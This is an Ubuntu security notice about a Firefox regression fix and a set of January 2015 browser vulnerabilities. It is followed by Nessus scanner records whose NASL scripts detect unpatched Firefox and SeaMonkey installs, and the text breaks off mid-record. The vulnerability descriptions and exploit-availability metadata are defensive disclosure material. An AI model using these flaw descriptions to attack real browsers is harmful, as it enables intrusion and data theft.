## Releases
* Ubuntu 14.10
* Ubuntu 14.04 ESM
* Ubuntu 12.04
## Packages
* firefox \- Mozilla Open Source web browser
USN-2458-1 fixed vulnerabilities in Firefox. This update introduced a
regression which could make websites that use CSP fail to load under some
circumstances. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Christian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse
Ruderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered
multiple memory safety issues in Firefox. If a user were tricked in to
opening a specially crafted website, an attacker could potentially exploit
these to cause a denial of service via application crash, or execute
arbitrary code with the privileges of the user invoking Firefox.
(CVE-2014-8634, CVE-2014-8635)
Bobby Holley discovered that some DOM objects with certain properties
can bypass XrayWrappers in some circumstances. If a user were tricked in
to opening a specially crafted website, an attacker could potentially
exploit this to bypass security restrictions. (CVE-2014-8636)
Michal Zalewski discovered a use of uninitialized memory when rendering
malformed bitmap images on a canvas element. If a user were tricked in to
opening a specially crafted website, an attacker could potentially
exploit this to steal confidential information. (CVE-2014-8637)
Muneaki Nishimura discovered that requests from navigator.sendBeacon()
lack an origin header. If a user were tricked in to opening a specially
crafted website, an attacker could potentially exploit this to conduct
cross-site request forgery (XSRF) attacks. (CVE-2014-8638)
Xiaofeng Zheng discovered that a web proxy returning a 407 response
could inject cookies in to the originally requested domain. If a user
connected to a malicious web proxy, an attacker could potentially exploit
this to conduct session-fixation attacks. (CVE-2014-8639)
Holger Fuhrmannek discovered a crash in Web Audio while manipulating
timelines. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial
of service. (CVE-2014-8640)
Mitchell Harper discovered a use-after-free in WebRTC. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit this to cause a denial of service via application
crash, or execute arbitrary code with the privileges of the user invoking
Firefox. (CVE-2014-8641)
Brian Smith discovered that OCSP responses would fail to verify if signed
by a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck
extension, potentially allowing a user to connect to a site with a revoked
certificate. (CVE-2014-8642)
{"nessus": [{"lastseen": "2023-02-17T14:35:56", "description": "Versions of SeaMonkey earlier than 2.32 are unpatched against the following vulnerabilities : \n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists where DOM objects with some specific properties can bypass XrayWrappers. This can allow web content to confuse privileged code, potentially enabling privilege escalation. (CVE-2014-8636)\n\n - A flaw exists in the rendering of bitmap images. When rending a malformed bitmap image, memory may not always be properly initialized, which can result in a leakage of data to web content. (CVE-2014-8637)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header, which allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)\n\n - A flaw exists in Web Audio that cam allow a small block of memory to be read. (CVE-2014-8640)\n\n - A read-after-free flaw exists in WebRTC due to the way tracks are handled, which can result in a potentially exploitable crash or incorrect WebRTC behavior. (CVE-2014-8641)\n\n - A flaw exists where delegated Online Certificate Status Protocol responder certificates fail to recognize the id-pkix-ocsp-nocheck extension. This can result in a user connecting to a site with a revoked certificate. (CVE-2014-8642)", "cvss3": {}, "published": "2015-01-16T00:00:00", "type": "nessus", "title": "SeaMonkey < 2.32 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:mozilla:seamonkey"], "id": "8626.PRM", "href": "https://www.tenable.com/plugins/nnm/8626", "sourceData": "Binary data 8626.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:05", "description": "The version of SeaMonkey installed on the remote host is prior to 2.32. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists where DOM objects with some specific properties can bypass XrayWrappers. This can allow web content to confuse privileged code, potentially enabling privilege escalation. (CVE-2014-8636)\n\n - A flaw exists in the rendering of bitmap images. When rending a malformed bitmap image, memory may not always be properly initialized, which can result in a leakage of data to web content. (CVE-2014-8637)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header, which allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)\n\n - A flaw exists in Web Audio that cam allow a small block of memory to be read. (CVE-2014-8640)\n\n - A read-after-free flaw exists in WebRTC due to the way tracks are handled, which can result in a potentially exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)\n\n - A flaw exists where delegated Online Certificate Status Protocol responder certificates fail to recognize the id-pkix-ocsp-nocheck extension. This can result in a user connecting to a site with a revoked certificate.\n (CVE-2014-8642)", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "SeaMonkey < 2.32 Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:mozilla:seamonkey"], "id": "SEAMONKEY_2_32.NASL", "href": "https://www.tenable.com/plugins/nessus/80525", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80525);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8634\",\n \"CVE-2014-8635\",\n \"CVE-2014-8636\",\n \"CVE-2014-8637\",\n \"CVE-2014-8638\",\n \"CVE-2014-8639\",\n \"CVE-2014-8640\",\n \"CVE-2014-8641\",\n \"CVE-2014-8642\"\n );\n script_bugtraq_id(\n 72041,\n 72042,\n 72044,\n 72045,\n 72046,\n 72047,\n 72048,\n 72049,\n 72050\n );\n\n script_name(english:\"SeaMonkey < 2.32 Vulnerability\");\n script_summary(english:\"Checks the version of SeaMonkey.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by a\nsignature forgery vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of SeaMonkey installed on the remote host is prior to\n2.32. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within\n the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists where DOM objects with some specific\n properties can bypass XrayWrappers. This can allow web\n content to confuse privileged code, potentially\n enabling privilege escalation. (CVE-2014-8636)\n\n - A flaw exists in the rendering of bitmap images. When\n rending a malformed bitmap image, memory may not always\n be properly initialized, which can result in a leakage\n of data to web content. (CVE-2014-8637)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it\n does not follow the cross-origin resource sharing\n specification. This results in requests from\n 'sendBeacon()' lacking an 'origin' header, which allows\n malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication\n responses with a 'set-cookie' header. This can allow\n a session-fixation attack. (CVE-2014-8639)\n\n - A flaw exists in Web Audio that cam allow a small block\n of memory to be read. (CVE-2014-8640)\n\n - A read-after-free flaw exists in WebRTC due to the way\n tracks are handled, which can result in a potentially\n exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)\n\n - A flaw exists where delegated Online Certificate Status\n Protocol responder certificates fail to recognize the\n id-pkix-ocsp-nocheck extension. This can result in a\n user connecting to a site with a revoked certificate.\n (CVE-2014-8642)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-02/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-05/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-08/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-09/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to SeaMonkey 2.32 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:seamonkey\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"SeaMonkey/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/SeaMonkey/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"SeaMonkey\");\n\nmozilla_check_version(installs:installs, product:'seamonkey', fix:'2.32', severity:SECURITY_HOLE, xss:FALSE, xsrf:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:29", "description": "USN-2458-1 fixed vulnerabilities in Firefox. This update introduced a regression which could make websites that use CSP fail to load under some circumstances. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nChristian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse Ruderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered multiple memory safety issues in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox. (CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties can bypass XrayWrappers in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to bypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when rendering malformed bitmap images on a canvas element.\nIf a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to steal confidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon() lack an origin header. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to conduct cross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response could inject cookies in to the originally requested domain. If a user connected to a malicious web proxy, an attacker could potentially exploit this to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating timelines. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Firefox.\n(CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if signed by a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck extension, potentially allowing a user to connect to a site with a revoked certificate. (CVE-2014-8642).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : firefox regression (USN-2458-3)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:firefox", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10"], "id": "UBUNTU_USN-2458-3.NASL", "href": "https://www.tenable.com/plugins/nessus/81041", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2458-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81041);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\");\n script_bugtraq_id(72041, 72042, 72044, 72045, 72046, 72047, 72048, 72049, 72050);\n script_xref(name:\"USN\", value:\"2458-3\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : firefox regression (USN-2458-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-2458-1 fixed vulnerabilities in Firefox. This update introduced a\nregression which could make websites that use CSP fail to load under\nsome circumstances. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nChristian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse\nRuderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered\nmultiple memory safety issues in Firefox. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit these to cause a denial of service via application crash, or\nexecute arbitrary code with the privileges of the user invoking\nFirefox. (CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain\nproperties can bypass XrayWrappers in some circumstances. If\na user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to\nbypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory\nwhen rendering malformed bitmap images on a canvas element.\nIf a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to steal\nconfidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from\nnavigator.sendBeacon() lack an origin header. If a user were\ntricked in to opening a specially crafted website, an\nattacker could potentially exploit this to conduct\ncross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407\nresponse could inject cookies in to the originally requested\ndomain. If a user connected to a malicious web proxy, an\nattacker could potentially exploit this to conduct\nsession-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while\nmanipulating timelines. If a user were tricked in to opening\na specially crafted website, an attacker could potentially\nexploit this to cause a denial of service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a\nuser were tricked in to opening a specially crafted website,\nan attacker could potentially exploit this to cause a denial\nof service via application crash, or execute arbitrary code\nwith the privileges of the user invoking Firefox.\n(CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to\nverify if signed by a delegated OCSP responder certificate\nwith the id-pkix-ocsp-nocheck extension, potentially\nallowing a user to connect to a site with a revoked\ncertificate. (CVE-2014-8642).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2458-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"firefox\", pkgver:\"35.0.1+build1-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"firefox\", pkgver:\"35.0.1+build1-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"firefox\", pkgver:\"35.0.1+build1-0ubuntu0.14.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:09", "description": "The version of Firefox installed on the remote Mac OS X host is prior to 35.0. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists where DOM objects with some specific properties can bypass XrayWrappers. This can allow web content to confuse privileged code, potentially enabling privilege escalation. (CVE-2014-8636)\n\n - A flaw exists in the rendering of bitmap images. When rending a malformed bitmap image, memory may not always be properly initialized, which can result in a leakage of data to web content. (CVE-2014-8637)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header, which allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)\n\n - A flaw exists in Web Audio that cam allow a small block of memory to be read. (CVE-2014-8640)\n\n - A read-after-free flaw exists in WebRTC due to the way tracks are handled, which can result in a potentially exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)\n\n - A flaw exists where delegated Online Certificate Status Protocol responder certificates fail to recognize the id-pkix-ocsp-nocheck extension. This can result in a user connecting to a site with a revoked certificate.\n (CVE-2014-8642)", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "Firefox < 35.0 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MACOSX_FIREFOX_35.NASL", "href": "https://www.tenable.com/plugins/nessus/80520", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80520);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8634\",\n \"CVE-2014-8635\",\n \"CVE-2014-8636\",\n \"CVE-2014-8637\",\n \"CVE-2014-8638\",\n \"CVE-2014-8639\",\n \"CVE-2014-8640\",\n \"CVE-2014-8641\",\n \"CVE-2014-8642\"\n );\n script_bugtraq_id(\n 72041,\n 72042,\n 72044,\n 72045,\n 72046,\n 72047,\n 72048,\n 72049,\n 72050\n );\n\n script_name(english:\"Firefox < 35.0 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox installed on the remote Mac OS X host is prior\nto 35.0. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within\n the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists where DOM objects with some specific\n properties can bypass XrayWrappers. This can allow web\n content to confuse privileged code, potentially\n enabling privilege escalation. (CVE-2014-8636)\n\n - A flaw exists in the rendering of bitmap images. When\n rending a malformed bitmap image, memory may not always\n be properly initialized, which can result in a leakage\n of data to web content. (CVE-2014-8637)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it\n does not follow the cross-origin resource sharing\n specification. This results in requests from\n 'sendBeacon()' lacking an 'origin' header, which allows\n malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication\n responses with a 'set-cookie' header. This can allow\n a session-fixation attack. (CVE-2014-8639)\n\n - A flaw exists in Web Audio that cam allow a small block\n of memory to be read. (CVE-2014-8640)\n\n - A read-after-free flaw exists in WebRTC due to the way\n tracks are handled, which can result in a potentially\n exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)\n\n - A flaw exists where delegated Online Certificate Status\n Protocol responder certificates fail to recognize the\n id-pkix-ocsp-nocheck extension. This can result in a\n user connecting to a site with a revoked certificate.\n (CVE-2014-8642)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-02/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-05/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-08/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-09/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Firefox 35.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n 